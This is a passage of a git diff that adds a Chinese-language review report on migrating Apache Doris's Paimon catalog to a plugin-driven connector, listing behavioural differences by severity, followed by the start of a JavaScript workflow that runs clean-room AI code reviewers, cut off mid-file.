PARTIAL 0**。三裁确认机械分歧:新代码 mapFields:945 设 nullable=field.type().isNullable();bridge toSchemaCacheValue 原样传 col.isNullable();convertColumn 直入 Column isAllowNull;SlotReference.fromColumn 直接据 column.isAllowNull() 设 slot nullable,达 nereids;legacy 两表均字面 true。impact 机制确认(SimplifyConditionalFunction.rewriteCoalesce 在 !child.nullable() 时丢 Coalesce 参;IsNull AlwaysNotNullable 可折叠)。普遍触发面:paimon PK 列总是 NOT NULL(Schema.normalizeFields 强制 copy(false)),PK 表为核心常态,故几乎每个 paimon PK 表都改变 nullability 元数据。new-code-correctness 一处 caveat:outer-join 子场景非有效触发器(nereids 跨 outer join 重算 slot nullability),但 schema-evolution default-fill 场景仍成立,且优化器现被 PERMITTED 不同折叠故结果可变,核心 claim 成立。 + +#### Finding 10.2 — Read 路径丢弃 paimon field unique-ids(column.uniqueId 留 -1);legacy 递归设 field.id() + +- **Severity**: MINOR +- **New**: `PaimonConnectorMetadata.java:939-954`(mapFields)和 `ConnectorColumnConverter.java:65-70` +- **Legacy**: `PaimonExternalTable.java:355` + `PaimonUtil.java:344-347`(updatePaimonColumnUniqueId 递归设 column.setUniqueId(field.id())) +- **Difference**: legacy 将每 Doris Column 的 uniqueId(及嵌套子)设为 paimon DataField.id()。新路径从不设 uniqueId;每列(及嵌套子)留 -1。mapFields 的 primaryKeys 参也未用。fe-core 消费方 ExternalUtil.getExternalSchema/initSchemaInfo(legacy datasource/paimon/source/PaimonScanNode 调)新 PluginDrivenScanNode/FileQueryScanNode 不调,故此 type-mapping 单元内缺失 id 无可证消费方。 +- **failureScenario**: 潜在:若任何新路径代码读 Column.getUniqueId() 建 BE field-id schema(如 legacy 经 ExternalUtil.initSchemaInfo),-1 ids 在 schema evolution 下错映列。今天从列映射代码不可达。 +- **suggestion**: 将 paimon field.id() 串入 ConnectorColumn 并在 convertColumn 设 Column.uniqueId,或 document 新扫描路径纯经 paimon.schema_id(native)/split 序列化解析 BE schema 无需 column uniqueId。移除/使用 mapFields 未用的 primaryKeys 参。 + +#### Finding 10.3 — Read 路径将所有 paimon 列标为 non-key;legacy 标为 key(DESC Key 列翻转) + +- **Severity**: MINOR +- **New**: `PaimonConnectorMetadata.java:946-951`(5-arg ConnectorColumn → isKey=false)→ convertColumn(cc.isKey()=false) +- **Legacy**: `PaimonExternalTable.java:352`(isKey 字面 true)和 `PaimonSysExternalTable.java:263` +- **Difference**: legacy 对每 paimon Doris 列建 isKey=true(普通表和系统表统一)。新路径 5-arg ConnectorColumn 默认 isKey=false。IndexSchemaProcNode 在 DESC `Key` 列打印 column.isKey()。 +- **failureScenario**: `DESC ` 现对每列显 Key=false 而 legacy 显 Key=true。仅显示分歧;无查询结果影响。 +- **suggestion**: 若需严格 DESC parity 则标列为 key,或刻意接受变更并注明。legacy 全 true 本身怪,可能是 intentional cleanup,但应为有意识决定。 + +#### Finding 10.4 — Read 路径不再为 TIMESTAMP_WITH_LOCAL_TIME_ZONE 列打 WITH_TIMEZONE extra info 标签 + +- **Severity**: MINOR +- **New**: `PaimonConnectorMetadata.java:939-954`(mapFields 从不调任何 setWithTZExtraInfo 等价) +- **Legacy**: `PaimonExternalTable.java:356-358`(和 `PaimonSysExternalTable.java:270-272`):if typeRoot==TIMESTAMP_WITH_LOCAL_TIME_ZONE column.setWithTZExtraInfo() +- **Difference**: legacy 为 TIMESTAMP_WITH_LOCAL_TIME_ZONE 列设 Column.extraInfo='WITH_TIMEZONE';新路径无处设 extraInfo(SPI ConnectorColumn 无 extra-info 字段)。Column.getExtraInfo() 喂 DESC `Extra` 列。 +- **failureScenario**: 对 TIMESTAMP_WITH_LOCAL_TIME_ZONE 列的 `DESC` 不再在 Extra 列显 WITH_TIMEZONE 标记。仅显示;无类型/结果影响。 +- **suggestion**: 若需 parity 扩展 SPI 携 withTimeZone 标志(或 bridge 在 connector type 为 TIMESTAMPTZ 时设 extraInfo);否则 document 丢失的 DESC 标记。 + +#### Finding 10.5 — VARCHAR 长度边界从 > 65533 改为 >= 65533(VARCHAR(65533) 现映射为 STRING) + +- **Severity**: MINOR +- **New**: `PaimonTypeMapping.java:113-119`(toVarcharType: if (len <= 0 || len >= 65533) return STRING) +- **Legacy**: `PaimonUtil.java:239-244`(if (varcharLen > 65533) return createStringType(); else createVarcharType(varcharLen)) +- **Difference**: legacy 将长度恰 65533(== MAX_VARCHAR_LENGTH)的 paimon VARCHAR 映射为 Doris VARCHAR(65533);新路径 `>= 65533` 测试映射为 STRING(不同 Doris scalar 类型)。CHAR 边界(>255)不变正确。额外 `len <= 0` guard 对合法 paimon VarChar(min 1)不可达。 +- **failureScenario**: VARCHAR(65533) 列在 DESC/SHOW CREATE TABLE 渲染为 STRING 并对 planner 暴露 PrimitiveType.STRING。均为 max-length string 类型,结果不变;仅报告类型不同。 +- **suggestion**: 边界改为 `len > 65533`(strict)以匹配 legacy,使长度 65533 保 VARCHAR(65533)。 + +--- + +### 路径 11. mtmv + +覆盖说明:MTMV base-table 路径两侧端到端追踪。getTableSnapshot、getPartitionSnapshot、isPartitionInvalid、partition name 渲染(含 DATE epoch-day 在 partition.legacy-name 下)、partition-key/type 排序、toListPartitionItem、getPartitionType/Columns/ColumnNames、isPartitionColumnAllowNull=true、beforeMTMVRefresh no-op、capability gating(SUPPORTS_MVCC_SNAPSHOT)、single-pin invariant 全部 parity。无 wrong-result/crash/data-loss 回退。两个分歧 documented、test-covered、benign-for-paimon(报 MINOR)。 + +#### Finding 11.1 — getNewestUpdateVersionOrTime 过滤负 lastModifiedMillis(>=0)而 legacy 不过滤 + +- **Severity**: MINOR +- **New**: `PluginDrivenMvccExternalTable.java:427-428` +- **Legacy**: `PaimonExternalTable.java:291-295` +- **Difference**: 新代码 reduce 用 `.filter(v -> v >= 0).max().orElse(0L)`,在 max() 前丢任何负 per-partition timestamp。Legacy reduce 用 `.mapToLong(Partition::lastFileCreationTime).max().orElse(0)` 无过滤,故负值会参与(并可能赢)max。filter 为抑制 SPI UNKNOWN(-1) sentinel;对 paimon,getLastModifiedMillis 始终为 Partition.lastFileCreationTime()(真 epoch,从无 -1 sentinel),故两 reduce 在每个现实输入上重合。 +- **failureScenario**: 仅在 Partition.lastFileCreationTime() 对全负分区集返回负 epoch 时可观察:新返回 0,legacy 返回(负)max。paimon 实践不出现,故仅在假设情形改 dictionary-update staleness 值,从不产错 MTMV refresh 结果。 +- **suggestion**: 无需改;行为 intentional + 单测覆盖(testGetNewestUpdateVersionOrTimeAllUnknownReturnsZeroNotSentinel)。若需严格 legacy parity 则仅对 SPI UNKNOWN sentinel gate filter。保持可接受。 + +#### Finding 11.2 — Paimon MVCC 表不再 advertise supportsLatestSnapshotPreload(eager snapshot preload 丢失) + +- **Severity**: MINOR +- **New**: `PluginDrivenExternalTable.java:133-140` +- **Legacy**: `PaimonExternalTable.java:327-330` +- **Difference**: legacy PaimonExternalTable override supportsLatestSnapshotPreload()=true 和 supportsExternalMetadataPreload()=true。新 PluginDrivenMvccExternalTable 不 override supportsLatestSnapshotPreload(继承 TableIf default false),base 仅对 jdbc override supportsExternalMetadataPreload 为 true,故对 paimon 两者实际 false。这禁用 PreloadExternalMetadata eager snapshot/schema/partition preload。 +- **failureScenario**: 此前预载 latest snapshot + partition view(锁获取前)的 paimon 查询/MTMV plan 现规划时惰性载。仅规划延迟/preload-warmup 回退;MVCC pin 仍经 StatementContext.loadSnapshots 在正常规划创建,故查询和 MTMV-refresh 结果不受影响。 +- **suggestion**: 若 paimon preload parity 重要则 override supportsLatestSnapshotPreload()=true(并考虑 supportsExternalMetadataPreload),或 gate on connector capability;否则 document intentional preload reduction。 + +--- + +### 路径 12. mvcc + +覆盖说明:MVCC snapshot-isolation 路径两侧端到端追踪。关键结果(flagged risk):查询起始钉的 snapshot 确实到达 split planning — 三个 scan-side handle-consumption 站点(getSplits:554、startSplit:694、getOrLoadPropertiesResult:877)在消费 currentHandle 前调 pinMvccSnapshot,resolveScanTable 的 Table.copy(scan.snapshot-id) override scan-time reload 默认值,故 split planning 从不静默 re-resolve "latest"。batch 路径也被钉。empty-table/no-handle 正确降级 snapshotId -1 不发 scan.snapshot-id=-1。time-travel、MTMV、isPartitionInvalid、@incr null-reset 剥离全 faithful 移植。 + +#### Finding 12.1 — B5a query-begin pin 不像 legacy 那样冻结 schema 版本(schemaId),故并发中途 schema evolution 可读 latest schema 而非 query-begin schema + +- **Severity**: MINOR +- **New**: `PluginDrivenMvccExternalTable.java:348-357`(getSchemaCacheValue)和 201-202(loadSnapshot B5a 路径返回 pinnedSchema==null) +- **Legacy**: `PaimonExternalTable.java:374-376`(getSchemaCacheValue)→ 378-381 getPaimonSchemaCacheValue → PaimonUtils.getSchemaCacheValue 在 snapshotValue.getSnapshot().getSchemaId() 解析;`metacache/paimon/PaimonLatestSnapshotProjectionLoader.java:79-81` 在 query-begin 捕获 latestSchemaId +- **Difference**: 对普通(非 time-travel)query-begin pin,legacy 在 loadSnapshot 时将 latest schemaId 存入钉的 PaimonSnapshot,每个 getSchemaCacheValue/getFullSchema 在该冻结 schemaId 读 schema(cache keyed by (nameMapping, schemaId))。新 B5a pin 设 pinnedSchema=null(仅显式 time-travel 设 pinned schema),故 getSchemaCacheValue fallback 到 getLatestSchemaCacheValue() 读当前 latest schema(仅 nameMapping keyed,无 schemaId)。connectorSnapshot 确携 schemaId 但 B5a 路径从不查询。 +- **failureScenario**: 查询在 paimon 表 schema v5 起始;statement 仍 analyzing/planning 时并发 writer commit schema 变更到 v6 且 FE schema metacache 该表条目被刷新。Legacy 全查询继续在钉的 schemaId v5 解析列;新路径对 getFullSchema/getPartitionColumns 解析现-latest v6 schema 而数据仍在钉的 snapshot id 读,故列元数据(如加/改名/重排列)可与读行的 snapshot 不一致。窗口窄(需单 statement 内 schema-cache 刷新)且数据行仍在钉的 snapshot id 读,故为一致性分歧而非保证错结果。 +- **suggestion**: 在 B5a latest 路径捕获 query-begin schema id 入 pin 并在该 id 解析 schema(让 beginQuerySnapshot 也返回 latest schemaId,经 getTableSchema(session,handle,connectorSnapshot) 在该 schemaId 建 pinned PluginDrivenSchemaCacheValue 并存为 pinnedSchema),使 getSchemaCacheValue 在 query begin 冻结 schema 版本。若 intentional 则显式 document 为 known reduction。 + +--- + +### 路径 13. cross-cutting: 旧逻辑/fallback sweep + +覆盖说明:追踪 paimon catalog 每个可达 cross-cutting dispatch 点,对比 post-cutover(NEW PluginDriven)与 LEGACY 流。验证每个残留 legacy 引用 post-cutover 为 DEAD(不可达)而非分歧 live fallback。详见下 "仍走旧逻辑 / fallback 清单" 章节。 + +#### Finding 13.1 — SHOW CREATE TABLE 仅在 connector 属性非空时发 LOCATION/PROPERTIES(legacy paimon 始终发) + +- **Severity**: NIT +- **New**: `Env.java:4946-4959` +- **Legacy**: `Env.java:4917-4928` +- **Difference**: legacy PAIMON_EXTERNAL_TABLE 分支(:4917-4928)无条件追加 `"\nLOCATION ''"` 和 PROPERTIES (...) 块,即使属性 map 为空。新 PLUGIN_EXTERNAL_TABLE 分支(:4947)将整个 LOCATION+PROPERTIES 发出 guard 于 `if (!properties.isEmpty())`。guard 为使其他 SPI connector(如 MaxCompute 返空 map)保持 comment-only 而加,但也改变 paimon 的理论 empty-map 情形。 +- **failureScenario**: 对真实 paimon 表不触发:PaimonConnectorMetadata.buildTableSchema 始终将 coreOptions().toMap()(总含 'path' 键)放入 schema properties(DataTable),故 properties 永不空,LOCATION/PROPERTIES 行始终渲染,匹配 legacy。分歧仅在(不出现的)paimon 表暴露零属性的假设中可达。 +- **suggestion**: 正确性无需改;guard intentional + benign(paimon 总暴露非空 coreOptions map 含 path)。可选加注释说明 guard 为与 always-emit legacy paimon DDL 的 deliberate 分歧点,防未来误判回退。 + +--- + +## new ↔ legacy 差异表 + +| 路径 | difference | severity | verdict | +|---|---|---|---| +| P1 normal scan | native-reader DATE/TIMESTAMP_LTZ 分区值裸 toString → 错值 | BLOCKER | CONFIRMED 3/0/0 | +| P1 normal scan | COUNT(*) pushdown 静默丢弃(仅性能) | MINOR | (未验证) | +| P1 normal scan | native 不 sub-split 大文件 + 省 selfSplitWeight(仅并行) | MINOR | (未验证) | +| P2 @incr | (无 finding;byte-identical 移植) | — | — | +| P3 time travel | FOR TIME AS OF 在 CST/PST/EST session 下失败 | MAJOR | CONFIRMED 3/0/0 | +| P4 branch/tag | branch schema 对 branch 表 vs base 表解析(corner case) | MINOR | (未验证) | +| P5 sys tables | sys-table fetchRowCount 返 -1 | MINOR | (未验证) | +| P5 sys tables | getSupportedSysTables 冗余 handle 往返 | MINOR | (未验证) | +| P5 sys tables | fail-loud guard 消息 Paimon→Plugin | NIT | (未验证) | +| P6 metadata cache | 查询内 schema/partition snapshot 非原子(自愈) | MINOR | (未验证) | +| P7 deletion vector | native-path DV 路径未归一化(主文件同样未归一化) | BLOCKER | PARTIAL 0/0/3 ⚠️ | +| P7 deletion vector | VERBOSE EXPLAIN delete-split 计账丢失 | NIT | (未验证) | +| P8 metastore flavors | REST vended credentials 不下发 BE | BLOCKER | CONFIRMED 3/0/0 | +| P8 metastore flavors | HMS hive.conf.resources 静默丢弃 | MAJOR | CONFIRMED 3/0/0 | +| P8 metastore flavors | JDBC driver_url 绕过安全 allow-list | MAJOR | PARTIAL 1/0/2 ⚠️(默认配置下不成立) | +| P8 metastore flavors | HMS socket timeout 忽略配置非默认值 | MINOR | (未验证) | +| P8 metastore flavors | hive.metastore.username 未映射 hadoop.username | MINOR | (未验证) | +| P9 storage systems | s3/oss 凭据从 Paimon FileIO 丢失 | BLOCKER | CONFIRMED 3/0/0 | +| P9 storage systems | DLF gate 通过但无 OSS 凭据 | BLOCKER | CONFIRMED 3/0/0 | +| P9 storage systems | hdfs.* auth aliases 未传播 | MINOR | (未验证) | +| P10 type mapping | read 路径传播 paimon NOT NULL(legacy 强制 nullable) | MAJOR | CONFIRMED 3/0/0 | +| P10 type mapping | read 路径丢 field unique-ids(留 -1) | MINOR | (未验证) | +| P10 type mapping | read 路径全列标 non-key(DESC Key 翻转) | MINOR | (未验证) | +| P10 type mapping | 不打 WITH_TIMEZONE extra info | MINOR | (未验证) | +| P10 type mapping | VARCHAR 边界 >65533 改为 >=65533 | MINOR | (未验证) | +| P11 mtmv | getNewestUpdateVersionOrTime 过滤负值(no-op for paimon) | MINOR | (未验证) | +| P11 mtmv | 不 advertise supportsLatestSnapshotPreload(仅延迟) | MINOR | (未验证) | +| P12 mvcc | B5a pin 不冻结 schemaId(并发 schema evolution 一致性) | MINOR | (未验证) | +| P13 fallback sweep | SHOW CREATE TABLE 空属性时不发 LOCATION/PROPERTIES(paimon 不触发) | NIT | (未验证) | +| 补充 statistics | getTableStatistics 缺 override → 行数恒 -1(cost-model 退化) | MAJOR | CONFIRMED 3/0/0 | +| 补充 cpp reader | enable_paimon_cpp_reader 被忽略 → Java 序列化破坏 BE cpp deserialize | BLOCKER | CONFIRMED 3/0/0 | +| 补充 path_partition_keys | path_partition_keys 未发出 → FE 列分类分歧 | MINOR | (BE 重建保正确;completeness critic 假设 BLOCKER 被专项降级) | +| 补充 partition render scope | TIME 分区列裸渲染(raw micros/millis) | MAJOR | PARTIAL 0/0/3 ⚠️(legacy 自身 CCE 崩;TIME 两侧 UNSUPPORTED) | +| 补充 partition render scope | BINARY/VARBINARY 分区列渲染 [B@hash(legacy throw→skip) | MAJOR | CONFIRMED 3/0/0 | +| 补充 partition render scope | 原 BLOCKER 修复须移植整个 serializePartitionValue switch + session TZ | MAJOR | PARTIAL 0/0/3 ⚠️(范围扩展正确但 TIME 子项对比不成立) | +| 补充 batch double-scan | supportsBatchScan 一旦开启 + planScan 忽略 requiredPartitions → N-fold 重复行 | MINOR | (latent,当前不可达) | + +--- + +## 仍走旧逻辑 / fallback 清单(来自 cross-cutting fallback-sweep,路径 13) + +paimon cutover 异常彻底。所有残留 legacy 引用 post-cutover 均为 DEAD(不可达),无分歧 live fallback。逐项: + +**Dispatch 入口(全部路由到 PluginDriven)** +- `CatalogFactory.createCatalog`(:50-129):"paimon" 在 SPI_READY_TYPES,每个新建 paimon catalog 为 PluginDrivenExternalCatalog;"paimon" 不在 built-in fallback switch(:133-156),legacy PaimonExternalCatalogFactory 从不实例化。 +- GSON 迁移(GsonUtils.java:402-411 catalog、:464 db、:489 table):镜像反序列化时将全部 5 个 legacy paimon flavor + PaimonExternalDatabase + PaimonExternalTable 改写为 PluginDriven{Catalog,Database,MvccExternalTable},重启 FE 从不重建 legacy 实例。 + +**DEAD-but-harmless legacy 引用** +- Scan dispatch(PhysicalPlanTranslator):paimon 走 PluginDrivenScanNode;无可达 PaimonScanNode 分支(legacy source/PaimonScanNode 仅 doc 注释引用)。 +- DB init(ExternalCatalog.buildDbForInit:884 + case PAIMON:956):PluginDrivenExternalCatalog override buildDbForInit(:481-486)强制 InitCatalogLog.Type.PLUGIN,gsonPostProcess(:506-511)将迁移的 PAIMON logType 改写为 PLUGIN;case PAIMON(→legacy PaimonExternalDatabase)不可达。 +- Sys-tables:getSupportedSysTables(:391-416)返回 PluginDrivenSysTable;SysTableResolver 从不调 legacy PaimonSysTable.createSysExternalTable(会对 PluginDrivenExternalTable 抛 IllegalArgumentException)。Sys-table 集 parity(SystemTableLoader.SYSTEM_TABLES == legacy SUPPORTED_SYS_TABLES)。 +- Auth(UserAuthentication.java:58-71):处理 PluginDrivenSysExternalTable→getSourceTable;PaimonSysExternalTable 分支 dead-but-harmless。 +- SHOW PARTITIONS:dispatch 顺序先查 PluginDrivenExternalCatalog(:478)后 PaimonExternalCatalog(:480),handleShowPaimonTablePartitions dead;新 handleShowPluginDrivenTablePartitions(:294-350)经 SUPPORTS_PARTITION_STATS 重现 5-column rich 输出;partition-name 渲染 parity 验证(含 partition.legacy-name DATE epoch→formatDate)。 +- SHOW CREATE TABLE(Env.java:4929-4959 PLUGIN 分支):两侧 unwrap sys→source 并发 LOCATION+PROPERTIES;connector buildTableDescriptor 返 HIVE_TABLE,SCHEMA_TABLE null-fallback 不触发。 +- Alter(Alter.java:616-622)和 BindRelation(:539-548):PAIMON_EXTERNAL_TABLE 与 PLUGIN_EXTERNAL_TABLE 同 case,paimon 被处理。 + +**仍 live 且 SHARED(共享,无分歧)** +- Cache routing(ExternalMetaCacheRouteResolver.java:69):PluginDriven paimon catalog 路由到 ENGINE_DEFAULT(DefaultExternalMetaCache),正是新路径 schema cache 所在;init 和 invalidate 经同一 resolver,REFRESH TABLE/CATALOG 失效到达新路径实际用的 cache。legacy PaimonExternalMetaCache(engine "paimon")从不被新路径填充。 +- Property/metastore Paimon* 类(PaimonHMS/File/Jdbc/Rest/AliyunDLF MetaStoreProperties):仍 live 且 SHARED — PluginDrivenExternalCatalog.initPreExecutionAuthenticator(:128)调 catalogProperty.getMetastoreProperties()→MetastoreProperties.create(type=paimon→PaimonPropertiesFactory)派生 ExecutionAuthenticator 串入 connector — 同 legacy 代码,无分歧。 +- Vended credentials(VendedCredentialsFactory.case PAIMON:65 + PaimonVendedCredentialsProvider):经 CatalogProperty.initStorageProperties 可达,但产出的 StorageProperties map **不被新 scan 路径消费**(PluginDrivenScanNode 从 connector 经 getScanNodeProperties 取所有 location/credential 属性);REST flavor short-circuit checkStorageProperties=false(不抛),非-REST 同 legacy。Benign。 + - ⚠️ *注:此处 fallback-sweep 判 vended credentials "benign",但路径 8 的 BLOCKER(REST vended credentials 不下发 BE)证伪了对 REST 的 benign 判断 —— 正是因为新 scan 路径不消费 vended StorageProperties,REST 临时凭据丢失致数据不可读。两审在 REST 上结论相反,以路径 8 的 CONFIRMED BLOCKER 为准。* + +**Cache 新鲜度** +- connector 不跨调用缓存 paimon Table(PaimonTableResolver.resolve→PaimonCatalogOps.getTable→catalog.getTable 每次),无 stale-snapshot 风险;REFRESH TABLE 拾取新 snapshot。 + +--- + +## Completeness / Gaps(critic 评估) + +critic 评估:13-path review 广度足、主要 read/MVCC/time-travel/metastore/type-mapping 路径覆盖好(含 native-path 分区渲染 BLOCKER 与 storage-credential BLOCKER)。但发现 digest 未覆盖的 code-grounded gap(均 firsthand 从源验证,非注释): + +**HIGH CONFIDENCE,likely real regressions(已纳入补充审查并对抗验证)** +1. **Table-level row-count statistics 静默丢失** — paimon connector 无 getTableStatistics override,fetchRowCount 返 -1 而 legacy 返真实规划行数。退化 Nereids cost model(join order / broadcast 决策)无报错。digest 完全未追踪 statistics/cardinality 路径(路径 5 仅注 sys-table fetchRowCount 返 -1,那里 no-op)。→ 补充审查 **MAJOR CONFIRMED 3/0/0**(StatsCalculator.disableJoinReorderIfStatsInvalid 在 rowCount==-1 时强制 DISABLE_JOIN_REORDER=true 整查询)。 +2. **enable_paimon_cpp_reader 路径丢弃** — 新 buildJniScanRange 始终用 Java-object 序列化;legacy 在 flag 设时切换 paimon-native split 序列化供 BE C++ reader。flag 经 session properties 可达且在 regression test 随机化(random.nextBoolean()),exercised 非理论。→ 补充审查 **BLOCKER CONFIRMED 3/0/0**(BE PaimonCppReader._decode_split 对 Java blob 跑 native Deserialize 失败 InternalError)。注:flag 默认 false,故不破坏默认读路径,仅 flag-on 时 deterministic 复现。 +3. **path_partition_keys 不由 paimon connector 发出**(hive 兄弟 native-read connector 发出),故 FileQueryScanNode 将分区列计为文件列并在 native ORC/Parquet 读分区表时误分类。→ 补充审查经 BE 代码追踪 **降级为 MINOR**:BE 在 table-format reader 路径从 columns_from_path_keys(新代码确实发出)category-independent 重建分区列;critic 的 BLOCKER 假设(BE 被告 0 path columns → 错行)不成立,因决定性 BE 分类是 columns_from_path_keys-driven 非 category/num_of_columns_from_file-driven。仅 FE-level parity 分歧 + latent fragility。 + +**MEDIUM / scope-extension** +4. **现有 native-path 分区渲染 BLOCKER 被低估** — 也损坏 TIME 和 BINARY/VARBINARY 分区(后者 legacy 故意跳过),非仅 DATE/TIMESTAMP_LTZ。→ 补充审查三子 finding:BINARY/VARBINARY **CONFIRMED 3/0/0**(legacy throw→skip 整分区 vs 新发 `[B@hash` 非确定性垃圾);TIME 与"完整 switch 移植"两项 **PARTIAL 0/0/3**(legacy TIME 走 `(Long)` cast 对 Integer 抛 CCE 本身就崩,且 TIME 两侧 UNSUPPORTED 致投影/谓词不可达,"legacy 正确"对比不成立 —— 仍真实渲染分歧但严重度夸大)。 +5. **latent(当前未激活)batch-mode double-scan hazard** — paimon planScan 忽略 requiredPartitions,若 supportsBatchScan 被启用而不 override planScanForPartitionBatch,每批 re-scan 整表 N-fold 重复行。→ 补充审查 **MINOR**:当前 supportsBatchScan 默认 false,shouldUseBatchMode 短路,不可达;建议加 fail-loud override 或单测钉 supportsBatchScan==false。 + +**DDL/DML 范围说明** +- critic 追踪 DDL write 路径(create/drop table/db)发现 PaimonSchemaBuilder/PaimonConnectorMetadata 为 faithful 移植(location→path rekey、primary-key 解析、comment fallback、identity-only partition guard、force-cascade drop),无新 DDL gap。INSERT/DML 正确 out of scope(legacy paimon 外表数据只读)。 + +--- + +## Phase C — reconciliation(findings 落盘后隔离执行;仅分类,不软化) + +> 纪律:本节在全部独立 findings 锁定落盘**之后**才执行,把独立 findings 对照**历史决策日志 / auto-memory(均当「待验证声明」,非权威)**,**仅用于分类**(真新发现 / 与既往结论矛盾 / 已知接受 tradeoff)。**严禁**用历史结论回头软化任何独立 finding——下列每条 CONFIRMED finding 的严重度与事实一律保持 Phase Review/Verify 的裁决。 + +### C.0 头条:既往「review clean」结论被本轮证伪 + +历史 auto-memory(`catalog-spi-p5-b7-cutover-scope` 记 B7 core cutover「4-lens 对抗 review clean」;B1/B2 设计记忆记各 batch「实现+测绿」)将相关区域记为已验证 / clean。本轮 **fresh clean-room** 在同一区域查出 **11 个 CONFIRMED BLOCKER/MAJOR**,集中于: + +- **凭据 / 存储装配(B1 区)**:5 个(P8 REST vended、P8 HMS conf.resources、P9 s3/oss、P9 DLF、+ enable_paimon_cpp_reader 序列化) +- **native 扫描渲染(B2 区)**:3 个(P1 DATE/LTZ、补充 BINARY、补充 fix-scope) +- **统计 / 类型**:getTableStatistics(MAJOR)、P10 NOT NULL(MAJOR) +- **时间旅行(B5b 区)**:P3 TZ alias(MAJOR) + +→ 这正是本轮 clean-room 纪律的价值:既往「clean」未能经受新一轮独立对抗审视。下列分类**不回头软化**任何一条。 + +### C.1 与既往决策「矛盾」(prior tradeoff 的前提被证伪)— 需用户重新定夺 + +- **P3 — FOR TIME AS OF 在 CST/PST/EST(含 Doris 默认 CST)失败**。既往 `catalog-spi-p5-b5b-design` / `catalog-spi-connector-session-tz-gotcha` 签 **「TZ time-travel fail-loud」**,理由:「连接器禁 import fe-core 别名图,错 TZ→错行不能 degrade」。 + - **矛盾点**:reviewer firsthand 证明 `TimeUtils.timeZoneAliasMap` **仅 4 条**(CST/PRC→Asia/Shanghai、UTC/GMT→UTC),完全可用**内联常量**复刻(与 B1 已采用的「DLF inline keys 避 Aliyun 编译依赖」同手法),既守 no-fe-core-import 规则、又对**真正未知** id 仍 fail-loud。且 **CST 是 Doris 默认 session 时区**,故该「fail-loud」实际把**默认配置**下的 time-travel 打挂,而非仅边角场景。 + - **结论**:既往「accepted tradeoff」建立在「别名不可复刻」的**错误前提**上;独立 finding(MAJOR)成立。建议采纳 reviewer 的 4-条内联修法。 + +### C.2 「真新发现」(既往未识别为已接受 tradeoff) + +- **P9 s3/oss 凭据丢失、P9 DLF 无 OSS 凭据、P8 REST vended creds 不下发 BE、P8 HMS hive.conf.resources 丢弃**(均 CONFIRMED,BLOCKER/MAJOR):根植于 `catalog-spi-p5-b1-design` 的「StorageProperties 禁 import → minimal Configuration 重建」。该**简化本身**是已知的,但「丢弃 *可用* 凭据 → BE 读不到数据」**从未被记为可接受**——反例:B1 自己已用 inline keys 处理 DLF,故漏掉 canonical `s3.access_key`/`s3.secret_key`/`s3.endpoint` 等是**实现疏漏(新回归)**,非有意取舍。 +- **enable_paimon_cpp_reader 被忽略、Java 序列化破坏 BE paimon-cpp deserialize**(BLOCKER):任何既往记忆均未覆盖;真新发现。 +- **getTableStatistics 未 override → 基表行数恒 -1**(MAJOR):未见既往决策覆盖;真新发现(cost-model 基数恒 UNKNOWN,影响 join order)。 +- **P10 read 路径传播 paimon NOT NULL**(MAJOR):未见既往决策覆盖;真新发现,需用户判定「传播 NOT NULL」属有意改进还是 join/null 语义回归(legacy 一律强制 nullable)。 +- **P1 native DATE/LTZ 渲染 + 补充 BINARY/fix-scope**(BLOCKER+MAJOR):属 B2 normal-read 区,但既往 b2 记忆仅提「partition_keys vs partition_columns key mismatch(FE 把 paimon 当非分区)」,**未识别** native columnsFromPath 的**值渲染**缺陷(DATE epoch 裸 toString);真新发现。 + +### C.3 「与既往已知一致」(非本轮新增风险)— 仅登记 + +- 若干 MINOR/NIT(如 P5 sys-table fail-loud 文案、P13 SHOW CREATE TABLE 仅在 connector properties 非空时发 LOCATION/PROPERTIES)与 `catalog-spi-p5-b4-design` / D-047 properties-map restore 相关,属已知范围,不构成新增 BLOCKER。 +- P12 MVCC schemaId 不冻结、P6 intra-query schema/partition 非原子:与既往「B5a query-begin pin」记述同向,登记为 MINOR 一致性裂隙。 + +### C.4 未被软化声明 + +本节未下调任何独立 finding 的严重度或事实。Phase Verify 阶段的 PARTIAL / 重定性裁决(P7 DV 路径未归一化、P8 JDBC driver_url、TIME 渲染)均系**对抗 reviewer 的 firsthand 裁决**(基于代码,非历史先验),已在 Executive Summary 如实标注;它们不是被历史结论软化的结果。 + +--- + +## 附:Workflow 元信息 + +- 编排脚本:`plan-doc/reviews/P5-paimon-fullpath-review.workflow.js`(clean-room prompts:仅中性路径名 + 裸文件指针 + legacy 基线 `1872ea05310` + 输出 schema;明令 reviewer 不读 plan-doc/ 决策日志、既往 review、.claude 记忆)。 +- 结构:Phase Review(13 fresh reviewers,每路一 subagent)→ Phase Verify(每 BLOCKER/MAJOR 派 3 lens 独立 refuter,majorityRefuted 降级)→ Completeness critic → Supplemental(5 gap,各一 reviewer+verify)→ Synthesis。 +- 规模:62 agents、~5.47M subagent tokens、~46 min。 +- review-only:未改任何产线代码;未 commit;未 git checkout/restore/stash/reset。 diff --git a/plan-doc/reviews/P5-paimon-fullpath-review.workflow.js b/plan-doc/reviews/P5-paimon-fullpath-review.workflow.js new file mode 100644 index 00000000000000..7218166c9075b6 --- /dev/null +++ b/plan-doc/reviews/P5-paimon-fullpath-review.workflow.js @@ -0,0 +1,528 @@ +export const meta = { + name: 'p5-paimon-fullpath-cleanroom-review', + description: 'Clean-room adversarial review of all paimon connector functional paths vs legacy', + phases: [ + { title: 'Review', detail: '13 fresh reviewers, one per functional path, neutral prompts only' }, + { title: 'Verify', detail: '3 adversarial refuters per BLOCKER/MAJOR finding (3 lenses)' }, + { title: 'Completeness', detail: 'critic identifies uncovered paths/aspects' }, + { title: 'Supplemental', detail: 'targeted review of each gap the critic flags' }, + { title: 'Synthesis', detail: 'faithful markdown report from all findings' }, + ], +} + +// ---------------------------------------------------------------------------- +// Clean-room guardrails — injected into every reviewer/refuter prompt. +// NO decision logs, NO prior review conclusions, NO memory content is ever +// forwarded. Reviewers judge purely from firsthand source code. +// ---------------------------------------------------------------------------- +const BASELINE = '1872ea05310' + +const CLEANROOM = [ + 'You are an independent, adversarial code reviewer performing a CLEAN-ROOM review.', + 'Judge ONLY from source code you read firsthand in this repository.', + 'Do NOT read, search, or rely on any of: files under plan-doc/, decision logs, prior review files (plan-doc/reviews/*), task docs, .claude/ memory files, or commit messages. Ignore code comments that merely assert intent — verify behavior from the code itself.', + 'Form your own conclusions purely by tracing the actual code. Do NOT assume prior reviews were correct or incorrect; there is no trusted prior verdict.', +].join('\n') + +const ARCH = [ + 'Architecture context (factual, not a conclusion):', + '- This repo is migrating the Apache Doris "paimon" external-catalog integration from a LEGACY design 